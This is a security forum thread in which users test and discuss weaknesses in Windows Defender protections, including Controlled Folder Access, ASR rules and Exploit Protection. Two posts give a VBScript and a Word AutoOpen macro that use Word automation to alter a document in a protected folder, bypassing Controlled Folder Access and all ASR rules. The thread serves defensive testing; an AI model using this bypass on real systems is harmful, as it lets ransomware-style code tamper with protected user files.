5

509322

@Lockdown,
I edited my previous post, because blocking execution via WMI was related to Exploit Protection mitigation "Do not allow child processes", but not to the ASR rule "Block Office applications from creating child processes" (false memory). So, probably your note about direct system calls is also related to this Exploit Protection mitigation.
Microsoft Windows spaghetti protection. If I test, I say a quick prayer before I start so I don't get sucked into the abyss.

Spaghetti protection is OK for researchers and geeks, but for people who rely on it, Oh boy...
 

Andy Ful

Level 62
Verified
Trusted
Content Creator
Microsoft Windows spaghetti protection. If I test, I say a quick prayer before I start so I don't get sucked into the abyss.
Spaghetti protection is OK for researchers and geeks, but for people who rely on it, Oh boy...
Ha, ha. Windows security is like the spaghetti hidden in the abyss. What can be more interesting for the researcher than abyss?:giggle:
 

Andy Ful

Level 62
Verified
Trusted
Content Creator
I am curious why the two Windows built-in features related to blocking child processes can work so differently. The ASR rule "Block Office applications from creating child processes" can be easily fooled by execution via WMI, but the Exploit Protection mitigation "Do not allow child processes" cannot (if applied to the MS Office application).
 

DeepWeb

Level 25
Verified
Like CIA once said in one of their leaked documents about AVs, if you can pretend to be a system process, you can do whatever you want on Windows. Meanwhile DEP for all programs is still not enabled by default. Some of the best Exploit Protection mitigation settings should be on by default. I have only seen 1 or two programs break. Until they redo the kernel and redo permissions and privileges, it will be an eternal cat and mouse game.
 

Andy Ful

Level 62
Verified
Trusted
Content Creator
Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

Date: February 6th, 2018.

Nothing has changed. CFA is still weak.
I tested this bypass with activated all ASR rules. Sadly, it succeeded.
Why? Because it uses Application Object (Word) which is built-in the MS Office Word, and Word can make changes in the folders protected by Controlled Folder Access Anti-Ransomware Protection. The details of code in Python are here (non malicious):
Microsoft Anti Ransomware bypass (not a vulnerability for Microsoft) ~ Security By Default
I made the VBScript file to do the similar thing. It can delete the first page of the document from the protected Documents folder.
Code:
Set wrd = CreateObject("Word.Application")
wrd.Documents.Open "C:\Users\User_Name\Documents\Part.docx"
wrd.Visible = False
wrd.ActiveDocument.Bookmarks("\Page").Range.Delete
wrd.ActiveDocument.SaveAs ("C:\Users\User_Name\Documents\Part.docx")
wrd.Application.Quit()
 
Last edited:
5

509322

Yeah, that will do it, for sure. Please tell my boss to stop asking me for Word docs, though...
Microsoft Office is the most polished.

Kingsoft WPS or SoftMaker Pro docs work just fine.

Kingsoft WPS is the closest to Office.

Both have really good inter-compatibility with Microsoft Office.

Word TextMaker

Cap6.PNG Cap7.PNG

There isn't much risk unless you are working with unknown documents. And malicious documents aren't too subtle... they're actually glaring.
 
Last edited by a moderator:

shmu26

Level 85
Verified
Trusted
Content Creator
Microsoft Office is the most polished.

Kingsoft WPS or SoftMaker Pro docs work just fine.

Kingsoft WPS is the closest to Office.

Both have really good inter-compatibility with Microsoft Office.

Word TextMaker

View attachment 198953 View attachment 198954

There isn't much risk unless you are working with unknown documents. And malicious documents aren't too subtle... they're actually glaring.
When someone emails a Word doc that I am probably going to just delete a minute later, I can view it and print it from Outlook Mail Online.
 
5

509322

When someone emails a Word doc that I am probably going to just delete a minute later, I can view it and print it from Outlook Mail Online.
If you are only opening your own self-created Office documents, then the risk is remote. Not unless you are crafting your own malicious documents and you happen to run one and infect yourself with it.
 

Andy Ful

Level 62
Verified
Trusted
Content Creator
So this is an example why one would want some Default-Deny protection when running WD?
I am afraid that this bypass is general for most security solutions with Anti-Ransomware modules. It is not special for Controlled Folder Access. Most Anti-Ransomware will have a problem with MS Office applications, because they are usually excluded from blocking - for example, Word cannot be blocked if you want to save documents in the protected folders.
Today, I will try to test the bypass via the weaponized document in Word 2016 to see how effective are AMSI and ASR mitigations for MS Office.(y)
 
5

509322

I am afraid that this bypass is general for most security solutions with Anti-Ransomware modules. It is not special for Controlled Folder Access. Most Anti-Ransomware will have a problem with MS Office applications, because they are usually excluded from blocking - for example, Word cannot be blocked if you want to save documents in the protected folders.
Today, I will try to test the bypass via the weaponized document in Word 2016 to see how effective are AMSI and ASR mitigations for MS Office.(y)
Office documents should not have access to file vaults. In our product, Microsoft Office is allowed to access the file vaults by default. I tell people to disable Office access. Use copy-paste to the file vault after doing your work. It is so simple and not any kind of objectionable inconvenience. A file vault is exactly that... a place for hardened storage. It is not very good if it allows access.
 

Andy Ful

Level 62
Verified
Trusted
Content Creator
I tested the below macro against Word 2016 with allowed macros + WD Controlled Folder Access + all ASR rules:
Code:
Sub AutoOpen()
'
Set wrd = GetObject(, "Word.Application")
wrd.Visible = True
wrd.Documents.Open "C:\Users\User_Name\Documents\Part.docx"
wrd.ActiveDocument.Bookmarks("\Page").Range.Delete
wrd.ActiveDocument.SaveAs ("C:\Users\User_Name\Documents\Part.docx")
Set wrd = Nothing
End Sub
The macro can open the document Part.docx, delete the first page, and save the changed document.
This macro bypassed the Controlled Folder Access + all ASR rules + Word hardening (except macros).
Of course it can be blocked when macros are not enabled.
 
Top